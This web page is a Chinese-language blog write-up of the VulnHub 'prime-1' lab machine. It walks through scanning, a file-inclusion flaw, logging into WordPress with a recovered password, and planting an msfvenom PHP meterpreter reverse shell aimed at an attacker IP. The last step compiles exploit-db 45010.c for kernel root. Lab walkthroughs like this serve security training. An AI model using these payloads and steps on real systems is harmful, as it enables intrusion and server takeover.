<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="prime-1Author:Xinggdirb配合wfuzz扫描获取后台密码，后台写入webshell，内核提权root">
<meta property="og:type" content="article">
<meta property="og:title" content="prime-1">
<meta property="og:url" content="http://yoursite.com/2020/03/17/prime-1/index.html">
<meta property="og:site_name" content="Xingg&#39;s Blog">
<meta property="og:description" content="prime-1Author:Xinggdirb配合wfuzz扫描获取后台密码，后台写入webshell，内核提权root">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020011913280356.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200119132827413.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200119132837320.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200119132850180.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200119132910971.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200119132923117.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/202001191329257.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020011913294553.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200119132952653.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200119133006995.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200119133020308.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020011913303014.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200119133040723.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200119133053881.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200119133106264.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200119133115981.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200119133120919.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200119133144428.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200119133156439.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200119133206956.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200119133209859.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200119133233826.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">
<meta property="article:published_time" content="2020-03-16T16:27:19.000Z">
<meta property="article:modified_time" content="2020-03-17T14:28:24.584Z">
<meta property="article:author" content="Xingg">
<meta property="article:tag" content="vulnhub">
<meta property="article:tag" content="HTB">
<meta property="article:tag" content="kali">
<meta property="article:tag" content="web安全">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/2020011913280356.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/03/17/prime-1/"/>





  <title>prime-1 | Xingg's Blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Xingg's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/17/prime-1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Xingg">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Xingg's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">prime-1</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-03-17T00:27:19+08:00">
                2020-03-17
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E6%9C%BA-vulnhub/" itemprop="url" rel="index">
                    <span itemprop="name">靶机-vulnhub</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="prime-1"><a href="#prime-1" class="headerlink" title="prime-1"></a>prime-1</h1><p><strong>Author:Xingg</strong><br>dirb配合wfuzz扫描获取后台密码，后台写入webshell，内核提权root</p>
<a id="more"></a>

<p>靶机下载地址<a href="https://www.vulnhub.com/entry/prime-1,358/" target="_blank" rel="noopener">https://www.vulnhub.com/entry/prime-1,358/</a></p>
<p>nmap -sS -sV -p- -T5<br><img src="https://img-blog.csdnimg.cn/2020011913280356.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>发现只开了22和80那就从80入手吧<br>浏览器访问 主页除了一张图片啥都没有<br> <img src="https://img-blog.csdnimg.cn/20200119132827413.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>dirb扫描目录发现了/wordpress目录和一些其他的页面<br><img src="https://img-blog.csdnimg.cn/20200119132837320.png" alt="在这里插入图片描述"><br>其中的image.php,secret.txt都不是默认字典有的，问了几个师傅，说做多了就有经验了，关键字典要自己扩充）<br><img src="https://img-blog.csdnimg.cn/20200119132850180.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>wpscan只发现了一个用户victor<br><img src="https://img-blog.csdnimg.cn/20200119132910971.png" alt="在这里插入图片描述"><br>image.php和主页一样只有一张图<br>看看dev和secret.txt<br>dev<br><img src="https://img-blog.csdnimg.cn/20200119132923117.png" alt="在这里插入图片描述"><br>secret.txt<br><img src="https://img-blog.csdnimg.cn/202001191329257.png" alt="在这里插入图片描述"><br>提示让我用fuzz模糊测试在某个页面中找到某参数=location.txt<br><img src="https://img-blog.csdnimg.cn/2020011913294553.png" alt="在这里插入图片描述"><br>使用wfuzz在index.php找到了file参数<br>进入<a href="http://192.168.49.18/index.php?file=location.txt得到进一步提示" target="_blank" rel="noopener">http://192.168.49.18/index.php?file=location.txt得到进一步提示</a><br><img src="https://img-blog.csdnimg.cn/20200119132952653.png" alt="在这里插入图片描述"><br>提示让我们在其他的页面上使用secrettier360参数  </p>
<p>继续fuzz<br>在image.php页面发现了dev<br><img src="https://img-blog.csdnimg.cn/20200119133006995.png" alt="在这里插入图片描述"><br>进去看<br><img src="https://img-blog.csdnimg.cn/20200119133020308.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>发现这里直接包含了dev，是一个文件包含<br>我们包含/etc/passwd<br><img src="https://img-blog.csdnimg.cn/2020011913303014.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>包含这个路径，得到密码<br><img src="https://img-blog.csdnimg.cn/20200119133040723.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>加上前面用wpscan扫描出来的用户victor<br>victor:follow_the_ippsec登录wp后台<br><img src="https://img-blog.csdnimg.cn/20200119133053881.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>进入后台后直奔Theme Editor<br><img src="https://img-blog.csdnimg.cn/20200119133106264.png" alt="在这里插入图片描述"><br>然后在右边的文件列表里找一个可以编辑的php<br><img src="https://img-blog.csdnimg.cn/20200119133115981.png" alt="在这里插入图片描述"><br>在msf里生成一个shell<br>msfvenom-p php/meterpreter_reverse_tcp LHOST=192.168.49.129 LPORT=4444 -oshell.php<br>然后在当前目录下cat shell.php<br>把它复制下来 贴进wp后台保存<br>上传成功后<br>进入msf 设置接收ip和端口<br><img src="https://img-blog.csdnimg.cn/20200119133120919.png" alt="在这里插入图片描述"><br>进入监听<br>然后去打开wp的那个shell.php<br>其默认路径为<br><a href="http://192.168.49.18/wordpress/wp-content/themes/twentynineteen/secret.php" target="_blank" rel="noopener">http://192.168.49.18/wordpress/wp-content/themes/twentynineteen/secret.php</a><br>然后kali这边已经收到了shell<br><img src="https://img-blog.csdnimg.cn/20200119133144428.png" alt="在这里插入图片描述"><br>（前后两次开机ip变了，这里的192.168.49.158就是靶机）<br>进入提权阶段<br>shell<br>python -c “import pty;pty.spawn(‘/bin/bash’);”<br>先查看当前系统的版本<br>uname –a<br>查看<br><img src="https://img-blog.csdnimg.cn/20200119133156439.png" alt="在这里插入图片描述"><br>直接msf搜索有无可利用的提权代码<br>searchsploit  16.04 Ubuntu<br>发现有可以利用的代码<br><img src="https://img-blog.csdnimg.cn/20200119133206956.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>出去复制出来<br>cp /usr/share/exploitdb/exploits/linux/local/45010.c ./<br>gcc编译<br>gcc 45010.c –o root<br>然后用meterpreter上传<br>上传的文件夹一定要有写权限 这里选择了/tmp<br><img src="https://img-blog.csdnimg.cn/20200119133209859.png" alt="在这里插入图片描述"><br>进入shell交互界面<br>给上执行权限<br>chmod +x root<br>然后./root执行 成功拿到root权限<br><img src="https://img-blog.csdnimg.cn/20200119133233826.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjEyODYxNA==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>虽然作者把这个靶机标为OSCP like machines，但是总的来说这个靶机还是比较常规的，除了secret.txt和image.php要在自己的字典里。用dirb做信息收集，用WFUZZ做模糊性测试，看见WordPress站，就想到用wpscan扫一下，在这个靶机中才能拿到用户名。web考察不是很多，只用到一个本地文件包含。进到wordpress后台，修改模板写一个shell，都是常规思路，内核漏洞提权也是常规提权手段。<br>    欢迎各位师傅指点。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/03/17/DC-1/" rel="next" title="DC-1">
                <i class="fa fa-chevron-left"></i> DC-1
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/03/17/DC-9/" rel="prev" title="DC-9">
                DC-9 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Xingg</p>
              <p class="site-description motion-element" itemprop="description">记录一个网安民工日常迷惑操作 xingg051@163.com</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">15</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#prime-1"><span class="nav-number">1.</span> <span class="nav-text">prime-1</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Xingg</span>

  
</div>
<!--

  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>

-->



        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
